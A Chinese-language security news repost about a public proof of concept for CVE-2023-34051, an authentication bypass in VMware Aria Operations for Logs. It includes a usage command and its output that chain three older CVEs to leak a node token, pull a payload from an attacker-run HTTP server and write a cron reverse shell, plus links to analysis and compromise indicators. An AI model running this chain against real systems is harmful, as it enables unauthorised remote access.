VMware Aria 日志操作 CVE-2023-34051身份验证绕过

admin 2023年10月26日02:42:56评论18 views字数 1172阅读3分54秒阅读模式



VMware Aria 日志操作 CVE-2023-34051身份验证绕过

CVE-2023-34051 是一种绕过 VMSA-2023-0001 补丁的身份验证绕过方法。适用于 vRealize Log Insight 的 VMSA-2023-0001 包括以下 CVE:

  • VMware vRealize Log Insight 目录遍历漏洞 (CVE-2022-31706)

  • VMware vRealize Log Insight 破坏访问控制漏洞 (CVE-2022-31704)

  • VMware vRealize Log Insight 包含信息泄露漏洞 (CVE-2022-31711)

该漏洞的默认配置会编写一个 cron 作业来创建反向 shell。请务必更改该payload文件以适合您的环境。


技术分析

您可以在我们的博客上找到该漏洞的技术根本原因分析:https ://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive


妥协指标

要分析 Log Insight 实例以查找妥协指标,请查看我们的 IOC 博客:https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/


概括

该POC滥用IP地址欺骗和各种Thrift RPC端点来实现任意文件写入。


用法

$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit [+] Using CVE-2022-31711 to leak node token[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8[+] Using CVE-2022-31704 to trigger malicious file download192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -[+] File successfully downloaded[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell[+] Payload successfully delivered


项目地址:

https://github.com/horizon3ai/CVE-2023-34051





感谢您抽出

VMware Aria 日志操作 CVE-2023-34051身份验证绕过

.

VMware Aria 日志操作 CVE-2023-34051身份验证绕过

.

VMware Aria 日志操作 CVE-2023-34051身份验证绕过

来阅读本文

VMware Aria 日志操作 CVE-2023-34051身份验证绕过

点它,分享点赞在看都在这里


原文始发于微信公众号(Ots安全):VMware Aria 日志操作 CVE-2023-34051身份验证绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月26日02:42:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VMware Aria 日志操作 CVE-2023-34051身份验证绕过https://cn-sec.com/archives/2134995.html

发表评论

匿名网友 填写信息